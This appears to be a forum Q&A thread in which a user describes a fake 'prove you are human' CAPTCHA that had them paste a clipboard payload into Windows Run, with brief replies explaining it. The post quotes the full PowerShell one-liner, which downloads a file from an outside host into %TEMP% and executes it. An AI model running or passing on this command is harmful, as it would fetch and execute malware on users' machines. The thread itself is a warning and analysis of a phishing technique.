I recently encountered a strange situation that seems like a phishing tactic. I visited a website, and it asked me to complete a "Prove you are human" Captcha with these steps: 1. Press Windows + R to open the Run command, 2. Press Control + V to paste something, and 3. Hit Enter. I didn't want to execute anything from that site, so I pasted the clipboard contents into a Notes document first. It turned out to be a PowerShell command: "powershell -NoProfile -Command 'wget 'https://nbdni.com/iks.php' -OutFile '%TEMP%cmd.cmd'; start '%TEMP%cmd.cmd';". I'm curious—what exactly would this have done to my computer?
3 Answers
Right now, that URL is just returning a 403 error, meaning access is denied. It’s possible they limit access based on things like the user agent. So, you may be lucky they weren't serving anything dangerous at the moment!
This script would have done a couple of things: first, it would have used 'wget' to download whatever is hosted at that URL into a temporary command file. Then, it would have run that command file, which could potentially execute harmful actions on your PC. It’s definitely not safe!
It's crazy how some sites trick you into running scripts like that. Out of curiosity, how did you end up on a site that asks for these kinds of commands?
That makes sense! The error type suggests it might depend on how the request is made. Sounds like it could be rotating or based on client info!